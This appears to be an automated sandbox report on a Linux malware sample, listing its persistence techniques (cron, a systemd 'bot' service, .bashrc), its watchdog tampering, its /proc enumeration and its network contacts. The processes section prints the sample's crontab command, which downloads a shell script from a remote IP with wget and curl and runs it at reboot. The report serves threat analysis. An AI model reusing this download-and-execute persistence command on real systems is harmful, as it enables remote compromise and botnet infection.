Malware Analysis Report

2025-08-05 17:00

Sample ID 240108-d89dtabee4
Target ccdcabc06ed12d315440fabad4c0e7a9.bin
SHA256 2f20edab143d494f6b418df73ba190b861e499878258ff45496974a261acd661
Tags
persistence
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

2f20edab143d494f6b418df73ba190b861e499878258ff45496974a261acd661

Threat Level: Shows suspicious behavior

The file ccdcabc06ed12d315440fabad4c0e7a9.bin was found to be: Shows suspicious behavior.

Malicious Activity Summary

persistence

Changes its process name

Modifies Watchdog functionality

Creates/modifies Cron job

Creates/modifies environment variables

Enumerates active TCP sockets

Enumerates running processes

Modifies systemd

Modifies Bash startup script

Reads system network configuration

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-01-08 03:41

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-01-08 03:41

Reported

2024-01-08 03:44

Platform

ubuntu1804-amd64-20231215-en

Max time kernel

141s

Max time network

154s

Command Line

[/tmp/9478bb8fa96a4b9baa199be60285800027abb1fd296ca8e0a0fd26ee647c49ff.elf]

Signatures

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself /bin/busybox /tmp/9478bb8fa96a4b9baa199be60285800027abb1fd296ca8e0a0fd26ee647c49ff.elf N/A

Modifies Watchdog functionality

Description Indicator Process Target
File opened for modification /dev/watchdog /tmp/9478bb8fa96a4b9baa199be60285800027abb1fd296ca8e0a0fd26ee647c49ff.elf N/A
File opened for modification /dev/misc/watchdog /tmp/9478bb8fa96a4b9baa199be60285800027abb1fd296ca8e0a0fd26ee647c49ff.elf N/A

Creates/modifies Cron job

persistence
Description Indicator Process Target
File opened for modification /var/spool/cron/crontabs/tmp.uIfVKk /usr/bin/crontab N/A

Creates/modifies environment variables

persistence
Description Indicator Process Target
File opened for modification /root/.bashrc N/A N/A

Enumerates active TCP sockets

Description Indicator Process Target
File opened for reading /proc/net/tcp N/A N/A

Enumerates running processes

Modifies systemd

persistence
Description Indicator Process Target
File opened for modification /lib/systemd/system/bot.service N/A N/A

Modifies Bash startup script

persistence
Description Indicator Process Target
File opened for modification /root/.bashrc N/A N/A

Reads system network configuration

Description Indicator Process Target
File opened for reading /proc/net/tcp N/A N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/532/fd N/A N/A
File opened for reading /proc/947/stat N/A N/A
File opened for reading /proc/1065/stat N/A N/A
File opened for reading /proc/170/stat N/A N/A
File opened for reading /proc/168/cmdline N/A N/A
File opened for reading /proc/265/stat N/A N/A
File opened for reading /proc/1141/cmdline N/A N/A
File opened for reading /proc/34/cmdline N/A N/A
File opened for reading /proc/1519/stat N/A N/A
File opened for reading /proc/1520/cmdline N/A N/A
File opened for reading /proc/1557/stat N/A N/A
File opened for reading /proc/156/stat N/A N/A
File opened for reading /proc/78/fd N/A N/A
File opened for reading /proc/1255/fd N/A N/A
File opened for reading /proc/28/fd N/A N/A
File opened for reading /proc/17/fd N/A N/A
File opened for reading /proc/24/stat N/A N/A
File opened for reading /proc/84/stat N/A N/A
File opened for reading /proc/1547/fd N/A N/A
File opened for reading /proc/1556/stat N/A N/A
File opened for reading /proc/14/stat N/A N/A
File opened for reading /proc/1111/cmdline N/A N/A
File opened for reading /proc/1088/cmdline N/A N/A
File opened for reading /proc/30/fd N/A N/A
File opened for reading /proc/154/stat N/A N/A
File opened for reading /proc/1136/stat N/A N/A
File opened for reading /proc/1190/cmdline N/A N/A
File opened for reading /proc/1290/fd N/A N/A
File opened for reading /proc/27/stat N/A N/A
File opened for reading /proc/82/fd N/A N/A
File opened for reading /proc/162/fd N/A N/A
File opened for reading /proc/171/stat N/A N/A
File opened for reading /proc/1112/stat N/A N/A
File opened for reading /proc/2/fd N/A N/A
File opened for reading /proc/254/cmdline N/A N/A
File opened for reading /proc/638/fd N/A N/A
File opened for reading /proc/160/stat N/A N/A
File opened for reading /proc/11/fd N/A N/A
File opened for reading /proc/83/fd N/A N/A
File opened for reading /proc/164/fd N/A N/A
File opened for reading /proc/332/cmdline N/A N/A
File opened for reading /proc/454/stat N/A N/A
File opened for reading /proc/1124/fd N/A N/A
File opened for reading /proc/1328/fd N/A N/A
File opened for reading /proc/9/cmdline N/A N/A
File opened for reading /proc/36/fd N/A N/A
File opened for reading /proc/1539/stat N/A N/A
File opened for reading /proc/34/stat N/A N/A
File opened for reading /proc/662/stat N/A N/A
File opened for reading /proc/26/fd N/A N/A
File opened for reading /proc/163/stat N/A N/A
File opened for reading /proc/711/cmdline N/A N/A
File opened for reading /proc/1120/fd N/A N/A
File opened for reading /proc/1164/stat N/A N/A
File opened for reading /proc/1520/stat N/A N/A
File opened for reading /proc/1552/cmdline N/A N/A
File opened for reading /proc/10/fd N/A N/A
File opened for reading /proc/460/cmdline N/A N/A
File opened for reading /proc/952/cmdline N/A N/A
File opened for reading /proc/1141/fd N/A N/A
File opened for reading /proc/1460/fd N/A N/A
File opened for reading /proc/1529/stat N/A N/A
File opened for reading /proc/1527/fd N/A N/A
File opened for reading /proc/79/cmdline N/A N/A

Processes

/tmp/9478bb8fa96a4b9baa199be60285800027abb1fd296ca8e0a0fd26ee647c49ff.elf

[/tmp/9478bb8fa96a4b9baa199be60285800027abb1fd296ca8e0a0fd26ee647c49ff.elf]

/bin/sh

[sh -c (crontab -l ; echo "@reboot /bin/bash -c "/bin/wget http://82.165.215.205/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://82.165.215.205/bins/bins.sh; chmod +x bins.sh; sh bins.sh"") | crontab -]

/usr/bin/crontab

[crontab -l]

/usr/bin/crontab

[crontab -]

/bin/chmod

[chmod +x bins.sh]

/bin/sh

[sh bins.sh]

/bin/curl

[/bin/curl -k -L --output bins.sh http://82.165.215.205/bins/bins.sh]

/bin/chmod

[chmod +x bins.sh]

/bin/sh

[sh bins.sh]

/bin/sh

[sh -c /bin/systemctl enable bot]

/bin/systemctl

[/bin/systemctl enable bot]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 151.101.2.49:443 tcp
US 151.101.1.91:443 tcp
GB 89.187.167.3:443 tcp
US 1.1.1.1:53 apple.bbos.ink udp
LT 176.223.133.62:1290 apple.bbos.ink tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.61:443 tcp

Files

/var/spool/cron/crontabs/tmp.uIfVKk

MD5 2f16a50a03b078ad9d67f3835641e9fd
SHA1 8317001974fe8b4806e2377f4e62f9c74d588388
SHA256 2d76916fafe2a76c0ec1fe539d813bec0aa03cf12d6a5301490d21dff498698f
SHA512 20b097960cce1f804f9be20f7ec9f36c75bfaba2dfaf6bf083433229d38db19896e9b95110eb47e6cafb69c8bc8f916a668115c2187ff00acf8833d607a18c85

/lib/systemd/system/bot.service

MD5 d77308e381db6ea7245af6f3b7be118e
SHA1 0a0f20a03f4db351a404954c780eebd15b3775bb
SHA256 feb6c31fee6eedbf83b5d657838427588bc7426532238a2675b8dbb74c9bf55b
SHA512 68c2b02daaaaa8d34e8f0a9264894fd781527b3b855477ac9435145daf5063e46d9abd7684f7c52be4f27850890be5261837dd3ad3f7a5a54d9343e2e6cda0e4